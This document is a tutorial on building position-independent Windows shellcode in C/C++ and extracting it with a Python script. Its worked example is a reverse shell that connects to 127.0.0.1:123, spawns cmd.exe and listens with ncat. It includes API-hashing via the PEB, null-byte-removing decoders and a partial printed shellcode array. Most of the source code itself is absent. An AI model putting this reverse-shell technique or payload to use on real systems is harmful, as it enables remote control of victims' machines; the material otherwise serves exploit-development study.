Introduction

A shellcode is a piece of code which is sent as payload by an exploit, is injected in the vulnerable application and is executed. A shellcode must be position independent, i.e. it must work no matter its position in memory and shouldn’t contain null bytes, because the shellcode is usually copied by functions like strcpy() which stop copying when they encounter a null byte. If a shellcode should contain a null byte, those functions would copy that shellcode only up to the first null byte and thus the shellcode would be incomplete.

Shellcode is usually written directly in assembly, but this doesn’t need to be the case. In this section, we’ll develop shellcode in C/C++ using Visual Studio 2013. The benefits are evident:

  1. shorter development times
  2. intellisense
  3. ease of debugging

We will use VS 2013 to produce an executable file with our shellcode and then we will extract and fix (i.e. remove the null bytes) the shellcode with a Python script.

C/C++ code

Use only stack variables

To write position independent code in C/C++ we must only use variables allocated on the stack. This means that we can’t write

because that array would be allocated on the heap. More important, this would try to call the new operator function from msvcr120.dll using an absolute address:

00191000 6A 64                push        64h
00191002 FF 15 90 20 19 00    call        dword ptr ds:[192090h]

The location 192090h contains the address of the function.

If we want to call a function imported from a library, we must do so directly, without relying on import tables and the Windows loader.

Another problem is that the new operator probably requires some kind of initialization performed by the runtime component of the C/C++ language. We don’t want to include all that in our shellcode.

We can’t use global variables either:

The assignment above (if not optimized out), produces

008E1C7E C7 05 30 91 8E 00 0C 00 00 00 mov         dword ptr ds:[8E9130h],0Ch

where 8E9130h is the absolute address of the variable x.

Strings pose a problem. If we write

the string will be put into the section .rdata of the executable and will be referenced with an absolute address. You must not use printf in your shellcode: this is just an example to see how str is referenced. Here’s the asm code:

00A71006 8D 45 F0             lea         eax,[str]
00A71009 56                   push        esi
00A7100A 57                   push        edi
00A7100B BE 00 21 A7 00       mov         esi,0A72100h
00A71010 8D 7D F0             lea         edi,[str]
00A71013 50                   push        eax
00A71014 A5                   movs        dword ptr es:[edi],dword ptr [esi]
00A71015 A5                   movs        dword ptr es:[edi],dword ptr [esi]
00A71016 A5                   movs        dword ptr es:[edi],dword ptr [esi]
00A71017 A4                   movs        byte ptr es:[edi],byte ptr [esi]
00A71018 FF 15 90 20 A7 00    call        dword ptr ds:[0A72090h]

As you can see, the string, located at the address A72100h in the .rdata section, is copied onto the stack (str points to the stack) through movsd and movsb. Note that A72100h is an absolute address. This code is definitely not position independent.

If we write

the string is still put into the .rdata section, but it’s not copied onto the stack:

00A31000 68 00 21 A3 00       push        0A32100h
00A31005 FF 15 90 20 A3 00    call        dword ptr ds:[0A32090h]

The absolute position of the string in .rdata is A32100h.
How can we makes this code position independent?
The simpler (partial) solution is rather cumbersome:

Here’s the asm code:

012E1006 8D 45 F0             lea         eax,[str]
012E1009 C7 45 F0 49 27 6D 20 mov         dword ptr [str],206D2749h
012E1010 50                   push        eax
012E1011 C7 45 F4 61 20 73 74 mov         dword ptr [ebp-0Ch],74732061h
012E1018 C7 45 F8 72 69 6E 67 mov         dword ptr [ebp-8],676E6972h
012E101F C6 45 FC 00          mov         byte ptr [ebp-4],0
012E1023 FF 15 90 20 2E 01    call        dword ptr ds:[12E2090h]

Except for the call to printf, this code is position independent because portions of the string are coded directly in the source operands of the mov instructions. Once the string has been built on the stack, it can be used.

Unfortunately, when the string is longer, this method doesn’t work anymore. In fact, the code

produces

013E1006 66 0F 6F 05 00 21 3E 01 movdqa      xmm0,xmmword ptr ds:[13E2100h]
013E100E 8D 45 E8             lea         eax,[str]
013E1011 50                   push        eax
013E1012 F3 0F 7F 45 E8       movdqu      xmmword ptr [str],xmm0
013E1017 C7 45 F8 73 74 72 69 mov         dword ptr [ebp-8],69727473h
013E101E 66 C7 45 FC 6E 67    mov         word ptr [ebp-4],676Eh
013E1024 C6 45 FE 00          mov         byte ptr [ebp-2],0
013E1028 FF 15 90 20 3E 01    call        dword ptr ds:[13E2090h]

As you can see, part of the string is located in the .rdata section at the address 13E2100h, while other parts of the string are encoded in the source operands of the mov instructions like before.

The solution I came up with is to allow code like

and fix the shellcode with a Python script. That script needs to extract the referenced strings from the .rdata section, put them into the shellcode and fix the relocations. We’ll see how soon.

Don’t call Windows API directly

We can’t write

in our C/C++ code because “WaitForSingleObject” needs to be imported from kernel32.dll.

The process of importing a function from a library is rather complex. In a nutshell, the PE file contains an import table and an import address table (IAT). The import table contains information about which functions to import from which libraries. The IAT is compiled by the Windows loader when the executable is loaded and contains the addresses of the imported functions. The code of the executable call the imported functions with a level of indirection. For example:

 001D100B FF 15 94 20 1D 00    call        dword ptr ds:[1D2094h]

The address 1D2094h is the location of the entry (in the IAT) which contains the address of the function MessageBoxA. This level of indirection is useful because the call above doesn’t need to be fixed (unless the executable is relocated). The only thing the Windows loader needs to fix is the dword at 1D2094h, which is the address of the MessageBoxA function.

The solution is to get the addresses of the Windows functions directly from the in-memory data structures of Windows. We’ll see how this is done later.

Install VS 2013 CTP

First of all, download the Visual C++ Compiler November 2013 CTP from here and install it.

Create a New Project

Go to FileNewProject…, select InstalledTemplatesVisual C++Win32Win32 Console Application, choose a name for the project (I chose shellcode) and hit OK.

Go to Project<project name> properties and a new dialog will appear. Apply the changes to all configurations (Release and Debug) by setting Configuration (top left of the dialog) to All Configurations. Then, expand Configuration Properties and under General modify Platform Toolset so that it says Visual C++ Compiler Nov 2013 CTP (CTP_Nov2013). This way you’ll be able to use some features of C++11 and C++14 like static_assert.

Example of Shellcode

Here’s the code for a simple reverse shell (definition). Add a file named shellcode.cpp to the project and copy this code in it. Don’t try to understand all the code right now. We’ll discuss it at length.

Compiler Configuration

Go to Project<project name> properties, expand Configuration Properties and then C/C++. Apply the changes to the Release Configuration.

Here are the settings you need to change:

  • General:
    • SDL Checks: No (/sdl-)
      Maybe this is not needed, but I disabled them anyway.
  • Optimization:
    • Optimization: Minimize Size (/O1)
      This is very important! We want a shellcode as small as possible.
    • Inline Function Expansion: Only __inline (/Ob1)
      If a function A calls a function B and B is inlined, then the call to B is replaced with the code of B itself. With this setting we tell VS 2013 to inline only functions decorated with _inline.
      This is critical! main() just calls the entryPoint function of our shellcode. If the entryPoint function is short, it might be inlined into main(). This would be disastrous because main() wouldn’t indicate the end of our shellcode anymore (in fact, it would contain part of it). We’ll see why this is important later.
    • Enable Intrinsic Functions: Yes (/Oi)
      I don’t know if this should be disabled.
    • Favor Size Or Speed: Favor small code (/Os)
    • Whole Program Optimization: Yes (/GL)
  • Code Generation:
    • Security Check: Disable Security Check (/GS-)
      We don’t need any security checks!
    • Enable Function-Level linking: Yes (/Gy)

Linker Configuration

Go to Project<project name> properties, expand Configuration Properties and then Linker. Apply the changes to the Release Configuration. Here are the settings you need to change:

  • General:
    • Enable Incremental Linking: No (/INCREMENTAL:NO)
  • Debugging:
    • Generate Map File: Yes (/MAP)
      Tells the linker to generate a map file containing the structure of the EXE.
    • Map File Name: mapfile
      This is the name of the map file. Choose whatever name you like.
  • Optimization:
    • References: Yes (/OPT:REF)
      This is very important to generate a small shellcode because eliminates functions and data that are never referenced by the code.
    • Enable COMDAT Folding: Yes (/OPT:ICF)
    • Function Order: function_order.txt
      This reads a file called function_order.txt which specifies the order in which the functions must appear in the code section. We want the function entryPoint to be the first function in the code section so my function_order.txt contains just a single line with the word ?entryPoint@@YAHXZ. You can find the names of the functions in the map file.

getProcAddrByHash

This function returns the address of a function exported by a module (.exe or .dll) present in memory, given the hash associated with the module and the function. It’s certainly possible to find functions by name, but that would waste considerable space because those names should be included in the shellcode. On the other hand, a hash is only 4 bytes. Since we don’t use two hashes (one for the module and the other for the function), getProcAddrByHash needs to consider all the modules loaded in memory.

The hash for MessageBoxA, exported by user32.dll, can be computed as follows:

where hash is the sum of getHash(“user32.dll”) and getHash(“MessageBoxA”). The implementation of getHash is very simple:

As you can see, the hash is case-insensitive. This is important because in some versions of Windows the names in memory are all uppercase.

First, getProcAddrByHash gets the address of the TEB (Thread Environment Block):

where

The selector fs is associated with a segment which starts at the address of the TEB. At offset 30h, the TEB contains a pointer to the PEB (Process Environment Block). We can see this in WinDbg:

0:000> dt _TEB @$teb
ntdll!_TEB
+0x000 NtTib            : _NT_TIB
+0x01c EnvironmentPointer : (null)
+0x020 ClientId         : _CLIENT_ID
+0x028 ActiveRpcHandle  : (null)
+0x02c ThreadLocalStoragePointer : 0x7efdd02c Void
+0x030 ProcessEnvironmentBlock : 0x7efde000 _PEB
+0x034 LastErrorValue   : 0
+0x038 CountOfOwnedCriticalSections : 0
+0x03c CsrClientThread  : (null)
<snip>

The PEB, as the name implies, is associated with the current process and contains, among other things, information about the modules loaded into the process address space.

Here’s getProcAddrByHash again:

Here’s part of the PEB:

0:000> dt _PEB @$peb
ntdll!_PEB
   +0x000 InheritedAddressSpace : 0 ''
   +0x001 ReadImageFileExecOptions : 0 ''
   +0x002 BeingDebugged    : 0x1 ''
   +0x003 BitField         : 0x8 ''
   +0x003 ImageUsesLargePages : 0y0
   +0x003 IsProtectedProcess : 0y0
   +0x003 IsLegacyProcess  : 0y0
   +0x003 IsImageDynamicallyRelocated : 0y1
   +0x003 SkipPatchingUser32Forwarders : 0y0
   +0x003 SpareBits        : 0y000
   +0x004 Mutant           : 0xffffffff Void
   +0x008 ImageBaseAddress : 0x00060000 Void
   +0x00c Ldr              : 0x76fd0200 _PEB_LDR_DATA
   +0x010 ProcessParameters : 0x00681718 _RTL_USER_PROCESS_PARAMETERS
   +0x014 SubSystemData    : (null)
   +0x018 ProcessHeap      : 0x00680000 Void
   <snip>

At offset 0Ch, there is a field called Ldr which points to a PEB_LDR_DATA data structure. Let’s see that in WinDbg:

0:000> dt _PEB_LDR_DATA 0x76fd0200
ntdll!_PEB_LDR_DATA
   +0x000 Length           : 0x30
   +0x004 Initialized      : 0x1 ''
   +0x008 SsHandle         : (null)
   +0x00c InLoadOrderModuleList : _LIST_ENTRY [ 0x683080 - 0x6862c0 ]
   +0x014 InMemoryOrderModuleList : _LIST_ENTRY [ 0x683088 - 0x6862c8 ]
   +0x01c InInitializationOrderModuleList : _LIST_ENTRY [ 0x683120 - 0x6862d0 ]
   +0x024 EntryInProgress  : (null)
   +0x028 ShutdownInProgress : 0 ''
   +0x02c ShutdownThreadId : (null)

InMemoryOrderModuleList is a doubly-linked list of LDR_DATA_TABLE_ENTRY structures associated with the modules loaded in the current process’s address space. To be precise, InMemoryOrderModuleList is a LIST_ENTRY, which contains two fields:

0:000> dt _LIST_ENTRY
ntdll!_LIST_ENTRY
   +0x000 Flink            : Ptr32 _LIST_ENTRY
   +0x004 Blink            : Ptr32 _LIST_ENTRY

Flink means forward link and Blink backward link. Flink points to the LDR_DATA_TABLE_ENTRY of the first module. Well, not exactly: Flink points to a LIST_ENTRY structure contained in the structure LDR_DATA_TABLE_ENTRY.

Let’s see how LDR_DATA_TABLE_ENTRY is defined:

0:000> dt _LDR_DATA_TABLE_ENTRY
ntdll!_LDR_DATA_TABLE_ENTRY
   +0x000 InLoadOrderLinks : _LIST_ENTRY
   +0x008 InMemoryOrderLinks : _LIST_ENTRY
   +0x010 InInitializationOrderLinks : _LIST_ENTRY
   +0x018 DllBase          : Ptr32 Void
   +0x01c EntryPoint       : Ptr32 Void
   +0x020 SizeOfImage      : Uint4B
   +0x024 FullDllName      : _UNICODE_STRING
   +0x02c BaseDllName      : _UNICODE_STRING
   +0x034 Flags            : Uint4B
   +0x038 LoadCount        : Uint2B
   +0x03a TlsIndex         : Uint2B
   +0x03c HashLinks        : _LIST_ENTRY
   +0x03c SectionPointer   : Ptr32 Void
   +0x040 CheckSum         : Uint4B
   +0x044 TimeDateStamp    : Uint4B
   +0x044 LoadedImports    : Ptr32 Void
   +0x048 EntryPointActivationContext : Ptr32 _ACTIVATION_CONTEXT
   +0x04c PatchInformation : Ptr32 Void
   +0x050 ForwarderLinks   : _LIST_ENTRY
   +0x058 ServiceTagLinks  : _LIST_ENTRY
   +0x060 StaticLinks      : _LIST_ENTRY
   +0x068 ContextInformation : Ptr32 Void
   +0x06c OriginalBase     : Uint4B
   +0x070 LoadTime         : _LARGE_INTEGER

InMemoryOrderModuleList.Flink points to _LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks which is at offset 8, so we must subtract 8 to get the address of _LDR_DATA_TABLE_ENTRY.

First, let’s get the Flink pointer:

+0x00c InLoadOrderModuleList : _LIST_ENTRY [ 0x683080 - 0x6862c0 ]

Its value is 0x683080, so the _LDR_DATA_TABLE_ENTRY structure is at address 0x683080 – 8 = 0x683078:

0:000> dt _LDR_DATA_TABLE_ENTRY 683078
ntdll!_LDR_DATA_TABLE_ENTRY
   +0x000 InLoadOrderLinks : _LIST_ENTRY [ 0x359469e5 - 0x1800eeb1 ]
   +0x008 InMemoryOrderLinks : _LIST_ENTRY [ 0x683110 - 0x76fd020c ]
   +0x010 InInitializationOrderLinks : _LIST_ENTRY [ 0x683118 - 0x76fd0214 ]
   +0x018 DllBase          : (null)
   +0x01c EntryPoint       : (null)
   +0x020 SizeOfImage      : 0x60000
   +0x024 FullDllName      : _UNICODE_STRING "蒮m쿟ᄍ엘ᆲ膪n???"
   +0x02c BaseDllName      : _UNICODE_STRING "C:\Windows\SysWOW64\calc.exe"
   +0x034 Flags            : 0x120010
   +0x038 LoadCount        : 0x2034
   +0x03a TlsIndex         : 0x68
   +0x03c HashLinks        : _LIST_ENTRY [ 0x4000 - 0xffff ]
   +0x03c SectionPointer   : 0x00004000 Void
   +0x040 CheckSum         : 0xffff
   +0x044 TimeDateStamp    : 0x6841b4
   +0x044 LoadedImports    : 0x006841b4 Void
   +0x048 EntryPointActivationContext : 0x76fd4908 _ACTIVATION_CONTEXT
   +0x04c PatchInformation : 0x4ce7979d Void
   +0x050 ForwarderLinks   : _LIST_ENTRY [ 0x0 - 0x0 ]
   +0x058 ServiceTagLinks  : _LIST_ENTRY [ 0x6830d0 - 0x6830d0 ]
   +0x060 StaticLinks      : _LIST_ENTRY [ 0x6830d8 - 0x6830d8 ]
   +0x068 ContextInformation : 0x00686418 Void
   +0x06c OriginalBase     : 0x6851a8
   +0x070 LoadTime         : _LARGE_INTEGER 0x76f0c9d0

As you can see, I’m debugging calc.exe in WinDbg! That’s right: the first module is the executable itself. The important field is DLLBase (c). Given the base address of the module, we can analyze the PE file loaded in memory and get all kinds of information, like the addresses of the exported functions.

That’s exactly what we do in getProcAddrByHash:

To understand this piece of code you’ll need to have a look at the PE file format specification. I won’t go into too many details. One important thing you should know is that many (if not all) the addresses in the PE file structures are RVA (Relative Virtual Addresses), i.e. addresses relative to the base address of the PE module (DllBase). For example, if the RVA is 100h and DllBase is 400000h, then the RVA points to data at the address 400000h + 100h = 400100h.

The module starts with the so called DOS_HEADER which contains a RVA (e_lfanew) to the NT_HEADERS which are the FILE_HEADER and the OPTIONAL_HEADER. The OPTIONAL_HEADER contains an array called DataDirectory which points to various “directories” of the PE module. We are interested in the Export Directory.
The C structure associated with the Export Directory is defined as follows:

The field Name is a RVA to a string containing the name of the module. Then there are 5 important fields:

  • NumberOfFunctions:
    number of elements in AddressOfFunctions.
  • NumberOfNames:
    number of elements in AddressOfNames.
  • AddressOfFunctions:
    RVA to an array of RVAs (DWORDs) to the entrypoints of the exported functions.
  • AddressOfNames:
    RVA to an array of RVAs (DWORDs) to the names of the exported functions.
  • AddressOfNameOrdinals:
    RVA to an array of ordinals (WORDs) associated with the exported functions.

As the comments in the C/C++ code say, the arrays pointed to by AddressOfNames and AddressOfNameOrdinals run in parallel:
pic_a0b
While the first two arrays run in parallel, the third doesn’t and the ordinals taken from AddressOfNameOrdinals are indices in the array AddressOfFunctions.

So the idea is to first find the right name in AddressOfNames, then get the corresponding ordinal in AddressOfNameOrdinals (at the same position) and finally use the ordinal as index in AddressOfFunctions to get the RVA of the corresponding exported function.

DefineFuncPtr

DefineFuncPtr is a handy macro which helps define a pointer to an imported function. Here’s an example:

WSAStartup is a function imported from ws2_32.dll, so HASH_WSAStartup is computed this way:

When the macro is expanded,

becomes

where decltype(WSAStartup) is the type of the function WSAStartup. This way we don’t need to redefine the function prototype. Note that decltype was introduced in C++11.

Now we can call WSAStartup through My_WSAStartup and intellisense will work perfectly.

Note that before importing a function from a module, we need to make sure that that module is already loaded in memory. While kernel32.dll and ntdll.dll are always present (lucky for us), we can’t assume that other modules are. The easiest way to load a module is to use LoadLibrary:

This works because LoadLibrary is imported from kernel32.dll that, as we said, is always present in memory.

We could also import GetProcAddress and use it to get the address of all the other function we need, but that would be wasteful because we would need to include the full names of the functions in the shellcode.

entryPoint

entryPoint is obviously the entry point of our shellcode and implements the reverse shell. First, we import all the functions we need and then we use them. The details are not important and I must say that the winsock API are very cumbersome to use.

In a nutshell:

  1. we create a socket,
  2. connect the socket to 127.0.0.1:123,
  3. create a process by executing cmd.exe,
  4. attach the socket to the standard input, output and error of the process,
  5. wait for the process to terminate,
  6. when the process has ended, we terminate the current thread.

Point 3 and 4 are performed at the same time with a call to CreateProcess. Thanks to 4), the attacker can listen on port 123 for a connection and then, once connected, can interact with cmd.exe running on the remote machine through the socket, i.e. the TCP connection.

To try this out, install ncat (download), run cmd.exe and at the prompt enter

ncat -lvp 123

This will start listening on port 123.
Then, back in Visual Studio 2013, select Release, build the project and run it.

Go back to ncat and you should see something like the following:

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Kiuhnm>ncat -lvp 123
Ncat: Version 6.47 ( http://nmap.org/ncat )
Ncat: Listening on :::123
Ncat: Listening on 0.0.0.0:123
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:4409.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Kiuhnm\documents\visual studio 2013\Projects\shellcode\shellcode>

Now you can type whatever command you want. To exit, type exit.

main

Thanks to the linker option

Function Order: function_order.txt

where the first and only line of function_order.txt is ?entryPoint@@YAHXZ, the function entryPoint will be positioned first in our shellcode. This is what we want.

It seems that the linker honors the order of the functions in the source code, so we could have put entryPoint before any other function, but I didn’t want to mess things up. The main function comes last in the source code so it’s linked at the end of our shellcode. This allows us to tell where the shellcode ends. We’ll see how in a moment when we talk about the map file.

Python script

Introduction

Now that the executable containing our shellcode is ready, we need a way to extract and fix the shellcode. This won’t be easy. I wrote a Python script that

  1. extracts the shellcode
  2. handles the relocations for the strings
  3. fixes the shellcode by removing null bytes

By the way, you can use whatever you like, but I like and use PyCharm (download).

The script weighs only 392 LOC, but it’s a little tricky so I’ll explain it in detail.

Here’s the code:

Map file and shellcode length

We told the linker to produce a map file with the following options:

  • Debugging:
    • Generate Map File: Yes (/MAP)
      Tells the linker to generate a map file containing the structure of the EXE)
    • Map File Name: mapfile

The map file is important to determine the shellcode length.

Here’s the relevant part of the map file:

shellcode

 Timestamp is 54fa2c08 (Fri Mar 06 23:36:56 2015)

 Preferred load address is 00400000

 Start         Length     Name                   Class
 0001:00000000 00000a9cH .text$mn                CODE
 0002:00000000 00000094H .idata$5                DATA
 0002:00000094 00000004H .CRT$XCA                DATA
 0002:00000098 00000004H .CRT$XCAA               DATA
 0002:0000009c 00000004H .CRT$XCZ                DATA
 0002:000000a0 00000004H .CRT$XIA                DATA
 0002:000000a4 00000004H .CRT$XIAA               DATA
 0002:000000a8 00000004H .CRT$XIC                DATA
 0002:000000ac 00000004H .CRT$XIY                DATA
 0002:000000b0 00000004H .CRT$XIZ                DATA
 0002:000000c0 000000a8H .rdata                  DATA
 0002:00000168 00000084H .rdata$debug            DATA
 0002:000001f0 00000004H .rdata$sxdata           DATA
 0002:000001f4 00000004H .rtc$IAA                DATA
 0002:000001f8 00000004H .rtc$IZZ                DATA
 0002:000001fc 00000004H .rtc$TAA                DATA
 0002:00000200 00000004H .rtc$TZZ                DATA
 0002:00000208 0000005cH .xdata$x                DATA
 0002:00000264 00000000H .edata                  DATA
 0002:00000264 00000028H .idata$2                DATA
 0002:0000028c 00000014H .idata$3                DATA
 0002:000002a0 00000094H .idata$4                DATA
 0002:00000334 0000027eH .idata$6                DATA
 0003:00000000 00000020H .data                   DATA
 0003:00000020 00000364H .bss                    DATA
 0004:00000000 00000058H .rsrc$01                DATA
 0004:00000060 00000180H .rsrc$02                DATA

  Address         Publics by Value              Rva+Base       Lib:Object

 0000:00000000       ___guard_fids_table        00000000     <absolute>
 0000:00000000       ___guard_fids_count        00000000     <absolute>
 0000:00000000       ___guard_flags             00000000     <absolute>
 0000:00000001       ___safe_se_handler_count   00000001     <absolute>
 0000:00000000       ___ImageBase               00400000     <linker-defined>
 0001:00000000       ?entryPoint@@YAHXZ         00401000 f   shellcode.obj
 0001:000001a1       ?getHash@@YAKPBD@Z         004011a1 f   shellcode.obj
 0001:000001be       ?getProcAddrByHash@@YAPAXK@Z 004011be f   shellcode.obj
 0001:00000266       _main                      00401266 f   shellcode.obj
 0001:000004d4       _mainCRTStartup            004014d4 f   MSVCRT:crtexe.obj
 0001:000004de       ?__CxxUnhandledExceptionFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z 004014de f   MSVCRT:unhandld.obj
 0001:0000051f       ___CxxSetUnhandledExceptionFilter 0040151f f   MSVCRT:unhandld.obj
 0001:0000052e       __XcptFilter               0040152e f   MSVCRT:MSVCR120.dll
<snip>

The start of the map file tells us that section 1 is the .text section, which contains the code:

Start         Length     Name                   Class
0001:00000000 00000a9cH .text$mn                CODE

The second part tells us that the .text section starts with ?entryPoint@@YAHXZ, our entryPoint function, and that main (here called _main) is the last of our functions. Since main is at offset 0x266 and entryPoint is at 0, our shellcode starts at the beginning of the .text section and is 0x266 bytes long.

Here’s how we do it in Python:

extracting the shellcode

This part is very easy. We know the shellcode length and that the shellcode is located at the beginning of the .text section. Here’s the code:

I use the module pefile (download) which is quite intuitive to use. The relevant part is the body of the if.

strings and .rdata

As we said before, our C/C++ code may contain strings. For instance, our shellcode contains the following line:

The string cmd.exe is located in the .rdata section, a read-only section containing initialized data. The code refers to that string using an absolute address:

00241152 50                   push        eax  
00241153 8D 44 24 5C          lea         eax,[esp+5Ch]  
00241157 C7 84 24 88 00 00 00 00 01 00 00 mov         dword ptr [esp+88h],100h  
00241162 50                   push        eax  
00241163 52                   push        edx  
00241164 52                   push        edx  
00241165 52                   push        edx  
00241166 6A 01                push        1  
00241168 52                   push        edx  
00241169 52                   push        edx  
0024116A 68 18 21 24 00       push        242118h         <------------------------
0024116F 52                   push        edx  
00241170 89 B4 24 C0 00 00 00 mov         dword ptr [esp+0C0h],esi  
00241177 89 B4 24 BC 00 00 00 mov         dword ptr [esp+0BCh],esi  
0024117E 89 B4 24 B8 00 00 00 mov         dword ptr [esp+0B8h],esi  
00241185 FF 54 24 34          call        dword ptr [esp+34h]

As we can see, the absolute address for cmd.exe is 242118h. Note that the address is part of a push instruction and is located at 24116Bh. If we examine the file cmd.exe with a file editor, we see the following:

56A: 68 18 21 40 00           push        000402118h

where 56Ah is the offset in the file. The corresponding virtual address (i.e. in memory) is 40116A because the image base is 400000h. This is the preferred address at which the executable should be loaded in memory. The absolute address in the instruction, 402118h, is correct if the executable is loaded at the preferred base address. However, if the executable is loaded at a different base address, the instruction needs to be fixed. How can the Windows loader know what locations of the executable contains addresses which need to be fixed? The PE file contains a Relocation Directory, which in our case points to the .reloc section. This contains all the RVAs of the locations that need to be fixed.

We can inspect this directory and look for addresses of locations that

  1. are contained in the shellcode (i.e. go from .text:0 to the main function excluded),
  2. contains pointers to data in .rdata.

For example, the Relocation Directory will contain, among many other addresses, the address 40116Bh which locates the last four bytes of the instruction push 402118h. These bytes form the address 402118h which points to the string cmd.exe contained in .rdata (which starts at address 402000h).

Let’s look at the function get_shellcode_and_relocs. In the first part we extract the .rdata section:

The relevant part is the body of the elif.

In the second part of the same function, we analyze the relocations, find the locations within our shellcode and extract from .rdata the null-terminated strings referenced by those locations.

As we already said, we’re only interested in locations contained in our shellcode. Here’s the relevant part of the function get_shellcode_and_relocs:

pe.DIRECTORY_ENTRY_BASERELOC is a list of data structures which contain a field named entries which is a list of relocations. First we check that the current relocation is within the shellcode. If it is, we do the following:

  1. we append to relocs the offset of the relocation relative to the start of the shellcode;
  2. we extract from the shellcode the DWORD located at the offset just found and check that this DWORD points to data in .rdata;
  3. we extract from .rdata the null-terminated string whose starting location we found in (2);
  4. we add the string to addr_to_strings.

Note that:

  1. relocs contains the offsets of the relocations within shellcode, i.e. the offsets of the DWORDs within shellcode that need to be fixed so that they point to the strings;
  2. addr_to_strings is a dictionary that associates the addresses found in (2) above to the actual strings.

adding the loader to the shellcode

The idea is to add the strings contained in addr_to_strings to the end of our shellcode and then to make the code in our shellcode reference those strings. Unfortunately, the codestrings linking must be done at runtime because we don’t know the starting address of the shellcode. To do this, we need to prepend a sort of “loader” which fixes the shellcode at runtime. Here’s the structure of our shellcode after the transformation:
pic_a1

offX are DWORDs which point to the locations in the original shellcode that need to be fixed. The loader will fix these locations so that they point to the correct strings strX.

To see exactly how things work, try to understand the following code:

Let’s have a look at the loader:

The first CALL is used to get the absolute address of here in memory. The loader uses this information to fix the offsets within the original shellcode. ESI points to off1 so LODSD is used to read the offsets one by one. The instruction

ADD [EDI+EAX], EDI

fixes the locations within the shellcode. EAX is the current offX which is the offset of the location relative to here. This means that EDI+EAX is the absolute address of that location. The DWORD at that location contains the offset to the correct string relative to here. By adding EDI to that DWORD, we turn the DWORD into the absolute address to the string. When the loader has finished, the shellcode, now fixed, is executed.

To conclude, it should be said that add_loader_to_shellcode is called only if there are relocations. You can see that in the main function:

Removing null-bytes from the shellcode (I)

After relocations, if any, have been handled, it’s time to deal with the null bytes present in the shellcode. As we’ve already said, we need to remove them. To do that, I wrote two functions:

  1. get_fixed_shellcode_single_block
  2. get_fixed_shellcode

The first function doesn’t always work but produces shorter code so it should be tried first. The second function produces longer code but is guaranteed to work.

Let’s start with get_fixed_shellcode_single_block. Here’s the function definition:

The idea is very simple. We analyze the shellcode byte by byte and see if there is a missing value, i.e. a byte value which doesn’t appear anywhere in the shellcode. Let’s say this value is 0x14. We can now replace every 0x00 in the shellcode with 0x14. The shellcode doesn’t contain null bytes anymore but can’t run because was modified. The last step is to add some sort of decoder to the shellcode that, at runtime, will restore the null bytes before the original shellcode is executed. You can see that code defined in the array code:

There are a couple of important details to discuss. First of all, this code can’t contain null bytes itself, because then we’d need another piece of code to remove them 🙂

As you can see, the CALL instruction doesn’t jump to here because otherwise its opcode would’ve been

E8 00 00 00 00               #   CALL here

which contains four null bytes. Since the CALL instruction is 5 bytes, CALL here is equivalent to CALL $+5. The trick to get rid of the null bytes is to use CALL $+4:

E8 FF FF FF FF               #   CALL $+4

That CALL skips 4 bytes and jmp to the last FF of the CALL itself. The CALL instruction is followed by the byte C0, so the instruction executed after the CALL is INC EAX which corresponds to FF C0. Note that the value pushed by the CALL is still the absolute address of the here label.

There’s a second trick in the code to avoid null bytes:

We could have just used

but that would’ve produced null bytes. In fact, for a shellcode of length 0x400, we would’ve had

B9 00 04 00 00        MOV ECX, 400h

which contains 3 null bytes.

To avoid that, we choose a non-null byte which doesn’t appear in 00000400h. Let’s say we choose 0x01. Now we compute

<xor value 1 for shellcode len> = 00000400h xor 01010101 = 01010501h
<xor value 2 for shellcode len> = 01010101h

The net result is that <xor value 1 for shellcode len> and <xor value 2 for shellcode len> are both null-byte free and, when xored, produce the original value 400h.

Our two instructions become:

B9 01 05 01 01        MOV ECX, 01010501h
81 F1 01 01 01 01     XOR ECX, 01010101h

The two xor values are computed by the function get_xor_values.

Having said that, the code is easy to understand: it just walks through the shellcode byte by byte and overwrites with null bytes the bytes which contain the special value (0x14, in our previous example).

Removing null-bytes from the shellcode (II)

The method above can fail because we could be unable to find a byte value which isn’t already present in the shellcode. If that happens, we need to use get_fixed_shellcode, which is a little more complex.

The idea is to divide the shellcode into blocks of 254 bytes. Note that each block must have a “missing byte” because a byte can have 255 non-zero values. We could choose a missing byte for each block and handle each block individually. But that wouldn’t be very space efficient, because for a shellcode of 254*N bytes we would need to store N “missing bytes” before or after the shellcode (the decoder needs to know the missing bytes). A more clever approach is to use the same “missing byte” for as many 254-byte blocks as possible. We start from the beginning of the shellcode and keep taking blocks until we run out of missing bytes. When this happens, we remove the last block from the previous chunk and begin with a new chunk starting from this last block. In the end, we will have a list of <missing_byte, num_blocks> pairs:

[(missing_byte1, num_blocks1), (missing_byte2, num_blocks2), ...]

I decided to restrict num_blocksX to a single byte, so num_blocksX is between 1 and 255.

Here’s the part of get_fixed_shellcode which splits the shellcode into chunks:

Like before, we need to discuss the “decoder” which is prepended to the shellcode. This decoder is a bit longer than the previous one but the principle is the same.

Here’s the code:

bytes_blocks is the array

[missing_byte1, num_blocks1, missing_byte2, num_blocks2, ...]

we talked about before, but without pairs.

Note that the code starts with a JMP SHORT which skips bytes_blocks. For this to work len(bytes_blocks) must be less than or equal to 0x7F. But as you can see, len(bytes_blocks) appears in another instruction as well:

This requires that len(bytes_blocks) is less than or equal to 0x7F – 5, so this is the final condition. This is what happens if the condition is violated:

Let’s review the code in more detail:

Testing the script

This is the easy part! If we run the script without any arguments it says:

Shellcode Extractor by Massimiliano Tomassoli (2015)
 
Usage:
  sce.py <exe file> <map file>

If you remember, we told the linker of VS 2013 to also produce a map file. Just call the script with the path to the exe file and the path to the map file. Here’s what we get for our reverse shell:

Shellcode Extractor by Massimiliano Tomassoli (2015)

Extracting shellcode length from "mapfile"...
shellcode length: 614
Extracting shellcode from "shellcode.exe" and analyzing relocations...
Found 3 reference(s) to 3 string(s) in .rdata
Strings:
  ws2_32.dll
  cmd.exe
  127.0.0.1

Fixing the shellcode...
final shellcode length: 715

char shellcode[] =
"\xe8\xff\xff\xff\xff\xc0\x5f\xb9\xa8\x03\x01\x01\x81\xf1\x01\x01"
"\x01\x01\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa"
"\xe2\xf6\xe8\x05\x05\x05\x05\x5e\x8b\xfe\x81\xc6\x7b\x02\x05\x05"
